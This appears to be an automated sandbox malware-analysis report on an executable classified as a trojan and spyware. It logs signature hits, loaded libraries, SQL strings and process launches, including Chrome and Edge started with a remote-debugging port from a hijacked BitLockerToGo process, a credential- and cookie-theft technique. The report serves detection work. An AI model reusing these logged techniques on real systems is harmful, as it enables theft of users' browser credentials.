                          Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Metasploit Payloads - file msf.war - contents; Author: Florian Roth
                          Source: 00000000.00000003.1596858257.0000000011A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Metasploit Payloads - file msf.war - contents; Author: Florian Roth
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_008E144B GetCurrentProcess,NtQueryInformationProcess
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C9DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C9DB8C0 rand_s,NtQueryVirtualMemory
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C9DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C97F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAA6E903_2_6CAA6E90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CA2AEC03_2_6CA2AEC0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CAC0EC03_2_6CAC0EC0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CB00E203_2_6CB00E20
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 008E470C appears 287 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C9B94D0 appears 90 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C9ACBE8 appears 134 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 008F2143 appears 34 times
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 008F2265 appears 73 times
                          Source: S0FTWARE.exe, 00000000.00000000.1414514665.0000000001002000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs S0FTWARE.exe
                          Source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs S0FTWARE.exe
                          Source: S0FTWARE.exeBinary or memory string: OriginalFileName vs S0FTWARE.exe
                          Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                          Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                          Source: 00000000.00000003.1596858257.0000000011A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@64/255@22/19
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C9D7030
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F3101 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_008F3101
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F33B3 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,3_2_008F33B3
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\MFXHI3G9.htmJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: S0FTWARE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\S0FTWARE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: BitLockerToGo.exe, 00000003.00000003.2180360912.000000000320B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2378708448.000000000322A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2376930526.000000000322A000.00000004.00000020.00020000.00000000.sdmp, IECGIEBAE.3.dr, HJJEGCAAE.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: S0FTWARE.exeReversingLabs: Detection: 57%
                          Source: S0FTWARE.exeString found in binary or memory: github.com/saferwall/pe@v1.5.5/loadconfig.go
                          Source: unknownProcess created: C:\Users\user\Desktop\S0FTWARE.exe "C:\Users\user\Desktop\S0FTWARE.exe"
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2268,i,3846380570938654004,26334187060056597,262144 /prefetch:8
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2320,i,9641244863575168474,7710836502246451740,262144 /prefetch:3
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3052 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7088 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5220 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sxs.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mozglue.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wsock32.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msvcp140.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                          Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: S0FTWARE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: S0FTWARE.exeStatic file information: File size 5526528 > 1048576
                          Source: S0FTWARE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x24c800
                          Source: S0FTWARE.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x26fa00
                          Source: S0FTWARE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2692003466.00000000337C3000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2686848782.00000000278ED000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FA132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008FA132
                          Source: S0FTWARE.exeStatic PE information: section name: .symtab
                          Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                          Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_009109C2 push ecx; ret 3_2_009109D5
